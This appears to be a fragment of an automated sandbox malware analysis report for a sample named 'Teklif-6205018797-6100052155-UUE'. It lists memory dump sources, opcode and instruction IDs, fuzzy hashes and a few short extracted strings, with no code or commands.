                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: fa289217830b8b9f82b184b3d2fd4b2c40d77daf80d5c49d6b7d721383a9c70e
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: 4FE01278909108DBCB08DF94D9415ACBBB9EB85315F14D199DC0917351C7329E56EB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction ID: d687f231933bdec28d930db87f8cea77af89b806506223258db14a4dad7f9921
                                                          • Opcode Fuzzy Hash: 19c6821d68c523f0ef1d5e4f92cfa83d69cbc8ba1c7b8c09ae9defc716be3f27
                                                          • Instruction Fuzzy Hash: ADE0C238908108EBCB08DFD4D9805ACBBB9EB85300F10E1ACCC0C13341CA329E46EF85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a0d916c25c568cf2e6da93139937f25237e974ece2819d130d86b999b092b93
                                                          • Instruction ID: 5b75b1872647879d0f4764c8357537d6d04c4c7339b3f353cb287f68f1f0b2e2
                                                          • Opcode Fuzzy Hash: 1a0d916c25c568cf2e6da93139937f25237e974ece2819d130d86b999b092b93
                                                          • Instruction Fuzzy Hash: 80E0CD70441108DFC704DFF8D90464E7BF9EF45301F0045A5950493150EA755910DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be7f0987398b8112a4f03b6bdba614ee703d77a3c2fc937a6936667fa2456775
                                                          • Instruction ID: 12aa1d87a6ba505c133a7e3ae517b2cfb61fc552cadc50b029874b1d960c0b05
                                                          • Opcode Fuzzy Hash: be7f0987398b8112a4f03b6bdba614ee703d77a3c2fc937a6936667fa2456775
                                                          • Instruction Fuzzy Hash: 23E0C270841108EFCB00EFB4D904A8E77F9AF04300F0045A6950493150EA3A5E00EB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction ID: 3f09b9497b39c57fe00f57f67679817b1ee328a9207abae97f95fd01aaebfd3b
                                                          • Opcode Fuzzy Hash: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction Fuzzy Hash: BAE08C34908108DBC704EF94D8415ADBBBAAF85316F109198880A13381CA32AE82DB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction ID: c0af05a26245e0d104944ea859dc6b2cd715965f0af86517e2934b6eb56663bf
                                                          • Opcode Fuzzy Hash: 2b51b0d7be58c2c92a603f4853e17f63f5156a83847a77db44a48e444d938331
                                                          • Instruction Fuzzy Hash: 1DE08C38908108EBC704EF94D8405ACFBB9AB85305F209199980817341CB329E42DB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec936ce54183aacaa2db52a474675a2f804d97c620c2f7e59b60b7ba0083c98b
                                                          • Instruction ID: b9c3327760f48dc0986d88a28d8edd29fe0c86636bacaba84ea22113fbd5d4f2
                                                          • Opcode Fuzzy Hash: ec936ce54183aacaa2db52a474675a2f804d97c620c2f7e59b60b7ba0083c98b
                                                          • Instruction Fuzzy Hash: F5E0EC70D5A208DFCB44EFB9D94969CBBF5AB05211F1051A9DC09E3350E6325A90DB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a72b8efbc83deaaa037c7d5be4dfa59fd5e0a4a5674bcc7265116226d10ea05
                                                          • Instruction ID: 877a5556d1c07780c73151fe5b2549d5cf33d5ec6adf0dfcae30c36e15302a97
                                                          • Opcode Fuzzy Hash: 0a72b8efbc83deaaa037c7d5be4dfa59fd5e0a4a5674bcc7265116226d10ea05
                                                          • Instruction Fuzzy Hash: 67E0E570941208DFDB04EF98E895BADBBF2EB49318F244869E809EB355CB759E44CF05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b0d2dfe6638298ddf51791adb17aa33ed6686d76e33e24ea01b44865b0da9e6
                                                          • Instruction ID: 4a47c65a6e259457e5cb72eb9591193a47ac64d2f43ae46eb176214b8a376424
                                                          • Opcode Fuzzy Hash: 7b0d2dfe6638298ddf51791adb17aa33ed6686d76e33e24ea01b44865b0da9e6
                                                          • Instruction Fuzzy Hash: 7DE0C9789442288FC794EF24D8557DABBB6EB4A300F10849AD80DB7351CB301E89CF65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d05032759ab180161d75b0049201941832cb68bc9c6e5c270f585cd51f2842a9
                                                          • Instruction ID: 29890aa76d7c5af2f908a6110dcefb1126d266fa0598c8583f44fc138059429d
                                                          • Opcode Fuzzy Hash: d05032759ab180161d75b0049201941832cb68bc9c6e5c270f585cd51f2842a9
                                                          • Instruction Fuzzy Hash: 2DF01474905259CFDB60CF18D884F9977B2BB05304F5095E5D10DA7250DB765EC98F05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d6b008f0682886dc03c337b925ab3faf975db17a81aaf4b421af500794b6487
                                                          • Instruction ID: a36793c858cedabeed0c23294136f4228158a906742dd4924332caa8070935b9
                                                          • Opcode Fuzzy Hash: 3d6b008f0682886dc03c337b925ab3faf975db17a81aaf4b421af500794b6487
                                                          • Instruction Fuzzy Hash: B3E0E57090021C9FDB60DF94C950FEABBB9EB09300F0040E6A549AB640DA345E84CF60
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction ID: 12dd0456ee94ce15666dece039083d4c830ab5400eb0681e833c306c7422ff2d
                                                          • Opcode Fuzzy Hash: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction Fuzzy Hash: 97E08C308081089FC744DBA8C8002ACBBF8EB45205F148099884853382D6329A45DBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction ID: 9fa73b3b0cc7c45fcd06b0202afdd35e4ca6f69762b26d3aef5c5881cf8e73c7
                                                          • Opcode Fuzzy Hash: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction Fuzzy Hash: 2DE0C270808108DFC784DBE8C8042BCBFF8EB49301F1480D9CC0953381D6329E46DB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd82b503e3b4f264199e01a468f7dae4ac18c4a53a184b25eac1df0544443c9f
                                                          • Instruction ID: 3ccb399b5fa7b4a39913e12d886a1aa91e10153cdb48d55758f57123d2ce84dd
                                                          • Opcode Fuzzy Hash: cd82b503e3b4f264199e01a468f7dae4ac18c4a53a184b25eac1df0544443c9f
                                                          • Instruction Fuzzy Hash: EFF03930505208DFC700DF68E889B9CBBB1FB09318F1408AAE809AB242C7744D84CF06
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fb0b2903ba72b0329cf9b84a116e15b2cc3748859626b7518eaf6b33d9768904
                                                          • Instruction ID: b98963a6a2a0f488bd2c3f61a6c732fd7e4148ff2c614c5a401dedbda619d08b
                                                          • Opcode Fuzzy Hash: fb0b2903ba72b0329cf9b84a116e15b2cc3748859626b7518eaf6b33d9768904
                                                          • Instruction Fuzzy Hash: 6CE01230A01209EFDB44EFB4E941BAEB7FADF45204F1185A8E505AB244DA396F049B90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3cb3e74b836eec3760ffc789b119160c5dd24c1572f87d78d3ab54de6a4995e
                                                          • Instruction ID: 38cf6e6258b7da044f0457770ee45f148f9c46094bf6ced5d99dd588dec89de0
                                                          • Opcode Fuzzy Hash: a3cb3e74b836eec3760ffc789b119160c5dd24c1572f87d78d3ab54de6a4995e
                                                          • Instruction Fuzzy Hash: 7DD05E78509108DBC744CB98D910AAAB7ADEB45314F1494999C0947391DA339E01DB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91121c377850c107ac44d85fed184c57a7f8fd9b6308fdffd1bb751ebef84ee1
                                                          • Instruction ID: 3b11a198e996ce264d3ed0d0e91480b438a83c7f8d91b2685f6952250332efb7
                                                          • Opcode Fuzzy Hash: 91121c377850c107ac44d85fed184c57a7f8fd9b6308fdffd1bb751ebef84ee1
                                                          • Instruction Fuzzy Hash: 83D0A77050D108EFCB04CB94E800A6DB7FDDB45315F14949C9C0943351CA339D01EF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79b76907bbd00d4282d48303dfcb28f0af57671dd4153c0329c34c8067b52a95
                                                          • Instruction ID: aa1198d0ecb65a45fa2b95f97eec7741f620fc4c6ccd61e1edb7873ec567f3ac
                                                          • API String ID:
                                                          • Opcode ID: c29d1c75e431dc1cafc6b8f0fea1d42b92ec24f64a5f93e62f69cafdc7590469
                                                          • Instruction ID: 977da2d1f8150226f76eea768a527cbcde181d28103c2dcb2419633e12b089bb
                                                          • Opcode Fuzzy Hash: c29d1c75e431dc1cafc6b8f0fea1d42b92ec24f64a5f93e62f69cafdc7590469
                                                          • Instruction Fuzzy Hash: 24C04C325461146FF7054EA5CE4770DBA62FFA0764F0585296241C7A65C7389812D545
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ad7cbf7c87ec1c3969fe6c353af77436eecf84b161079ec877eda478c68884f
                                                          • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                          • Opcode Fuzzy Hash: 5ad7cbf7c87ec1c3969fe6c353af77436eecf84b161079ec877eda478c68884f
                                                          • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$,aq
                                                          • API String ID: 0-1929014441
                                                          • Opcode ID: f9cee9fe867e2472e03a60a7edd024a19b408f9d0080fb4992d8af8936e33a6c
                                                          • Instruction ID: 42ff7ae020f34dae5085665f2911cafbcd75b9dcd43db7dcc6ba64bea17a6871
                                                          • Opcode Fuzzy Hash: f9cee9fe867e2472e03a60a7edd024a19b408f9d0080fb4992d8af8936e33a6c
                                                          • Instruction Fuzzy Hash: 40D11834A40205DFCB15DF69C589A6EBBF6BF88315F29C8A9E406AB361C735EC41CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: c7758190f40c62b51d625629bedb4a335c1feabe26fbfd90c6a8e2fd6f0ac369
                                                          • Instruction ID: 95d75b364874ae584451201f4305457635c9cecf04dacae058bcdc8c5b5d8313
                                                          • Opcode Fuzzy Hash: c7758190f40c62b51d625629bedb4a335c1feabe26fbfd90c6a8e2fd6f0ac369
                                                          • Instruction Fuzzy Hash: 10711CB0A016058FDB48EF6AE94469ABBF7FFC5300F18D269D004AB279DF345946CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 47c6fcf79d8c806b0b1bbdaa33dc17ac4fdb436ac3a3a6e40790b200310bfbb6
                                                          • Instruction ID: 33af96d995e3ea7473f25f925539460bc61f4f13e98e3057bde81491a10e6fb4
                                                          • Opcode Fuzzy Hash: 47c6fcf79d8c806b0b1bbdaa33dc17ac4fdb436ac3a3a6e40790b200310bfbb6
                                                          • Instruction Fuzzy Hash: 4771FCB0A016058FDB48EF6AE94469ABBF7FFC5300F18D569D004AB279DF345946CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: >$_
                                                          • API String ID: 0-3683171403
                                                          • Opcode ID: ce63065a52b46a8b8f25bec93be14006a76c3328c3b3d5bca41f0d2c9c7dc2b9
                                                          • Instruction ID: 3b21638521385236cbdbc1ee326646ef7902641199bf0113c0b0213bd5edcc29
                                                          • Opcode Fuzzy Hash: ce63065a52b46a8b8f25bec93be14006a76c3328c3b3d5bca41f0d2c9c7dc2b9
                                                          • Instruction Fuzzy Hash: 20319D71E056188BDB58DF6BCC4969AFBF7AFC8310F14C1BA980CA6214DB340A81CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RZW+
                                                          • API String ID: 0-2016248192
                                                          • Opcode ID: 392cf5b20ba7a0d04460a3e318ad96e537dce44a2d54e796e68563c8ca2d5490
                                                          • Instruction ID: 961f3a76f39ca0c6774eece8f5cae2b7d173e629a6bc1545281918e71174d5f7
                                                          • Opcode Fuzzy Hash: 392cf5b20ba7a0d04460a3e318ad96e537dce44a2d54e796e68563c8ca2d5490
                                                          • Instruction Fuzzy Hash: B512B570E056189FDB14CFAAC98069DFBF2BF88314F24C169D819EB219D734A946CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: a56195b363f0940d1495dc208db242653bbd466eaf1cf974c59e7e92c7b96e2d
                                                          • Instruction ID: a5e619a053b88caeff9236e294a6402d0451dc70023faf8d34b8287f2bad7585
                                                          • Opcode Fuzzy Hash: a56195b363f0940d1495dc208db242653bbd466eaf1cf974c59e7e92c7b96e2d
                                                          • Instruction Fuzzy Hash: 99B1E5B0E45218CFEB14CFA9D884BADBBF2BB49314F2080AAD909EB255D7745D85CF05
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: daq
                                                          • API String ID: 0-1532007458
                                                          • Opcode ID: 7a6e1afba7e027110c92d2c62eb4f3cd3b3627bae62559df4e5e85bfcc2fb00c
                                                          • Instruction ID: 6d2839b0d1e2fb23f8a948b7b17299728bcb1cfacda1e88fe5295163f26acc69
                                                          • Opcode Fuzzy Hash: 7a6e1afba7e027110c92d2c62eb4f3cd3b3627bae62559df4e5e85bfcc2fb00c
                                                          • Instruction Fuzzy Hash: 1F812274D05218DFCB14EFA8D888BEDBBF2FB49304F218469E409AB285DB755989CF11
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: daq
                                                          • API String ID: 0-1532007458
                                                          • Opcode ID: aa10785b3dda13938ec9b04ca996794b2ca686788b4a719dff0ee944824223b2
                                                          • Instruction ID: 5af644432482e7c900fe5368d2c0d29ea58693ac71c33a35adcd4b39534e4a09
                                                          • Opcode Fuzzy Hash: aa10785b3dda13938ec9b04ca996794b2ca686788b4a719dff0ee944824223b2
                                                          • Instruction Fuzzy Hash: 8B813274D05218DFCB14EFA8D888BEDBBF2FB49304F218469E409A7285DB755989CF11
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: _
                                                          • API String ID: 0-701932520
                                                          • Opcode ID: b3255a7dd60979e82b24e0bd24f605fcfc788aad9ee2bf31d2cfddc171ad5ef4
                                                          • Instruction ID: f5003f0902b0eb2cc8875010c66c2b02cd6d4bcabe9255d35d75d56ea4c306a2
                                                          • Opcode Fuzzy Hash: b3255a7dd60979e82b24e0bd24f605fcfc788aad9ee2bf31d2cfddc171ad5ef4
                                                          • Instruction Fuzzy Hash: 3731D471D056598FEB19CF6B8C45299BFF3AFC5310F18C1FA984CAA265DA340A85CF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 140a6c919ed3cb5ef6d07c6c87c1f3abf36dc98a20e245c5a91fdc275991ad44
                                                          • Instruction ID: 8ce8799015cbde175512b111a361cc2bcb7f76bce73e4214977be770af02cff0
                                                          • Opcode Fuzzy Hash: 140a6c919ed3cb5ef6d07c6c87c1f3abf36dc98a20e245c5a91fdc275991ad44
                                                          • Instruction Fuzzy Hash: 58B14A78E05208CFDB54DFA9D484BAEBBFAFB49304F1480A9D40ABB255DB745988CF14
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0074692a1785819bc0a37a947d19eefb37fd828c8e609f7a13d77ab2372c55b4
                                                          • Instruction ID: ead81ddf6a96719eca99d03ef629dbaded16226bc61563fd9c670c364b91e314
                                                          • Opcode Fuzzy Hash: 0074692a1785819bc0a37a947d19eefb37fd828c8e609f7a13d77ab2372c55b4
                                                          • Instruction Fuzzy Hash: ADB14A78E05208CFDB14DFA5D484BAEBBFAFB4A304F1480A9D41ABB255DB745988CF14
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be1b451c1227104d06e3bbb56b92d8af5b76869b853cadcdf2a197251b6a0880
                                                          • Instruction ID: 338c06f4c8814987ccaefddf35df6d581ca0556ea34997804ccd82b90827b515
                                                          • Opcode Fuzzy Hash: be1b451c1227104d06e3bbb56b92d8af5b76869b853cadcdf2a197251b6a0880
                                                          • Instruction Fuzzy Hash: E9A1F470D45218DFDB14CFA9D844BEDBBF2FB49304F24956AD409AB265DB70988ACF00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbcfc967904001ecc97c1ed65cb9c71c043e29ec87cf6b67ef89f57acc97e07d
                                                          • Instruction ID: 7d15900fb28f39623c5efdc594adc284a4b62e958959be2fd5a637f50c38ed93
                                                          • Opcode Fuzzy Hash: dbcfc967904001ecc97c1ed65cb9c71c043e29ec87cf6b67ef89f57acc97e07d
                                                          • Instruction Fuzzy Hash: 87A10570D05218DFDB54CFA9D844BADBBF2FB49304F24856AD409BB265DB70998ACF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 183ecd1d9b39b2a30a04117a1854f5ff51e6fcb13823aa139d9a80c266ea6045
                                                          • Instruction ID: 35a85b56e5b12304a232559156880e2b3bd0c6797abdbd4d9f020d63459f7a2a
                                                          • Opcode Fuzzy Hash: 183ecd1d9b39b2a30a04117a1854f5ff51e6fcb13823aa139d9a80c266ea6045
                                                          • Instruction Fuzzy Hash: CD811B78D05208CFDB04DFA8D444BEEBBFAFB49304F24846AE409AB255DB749959CF05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
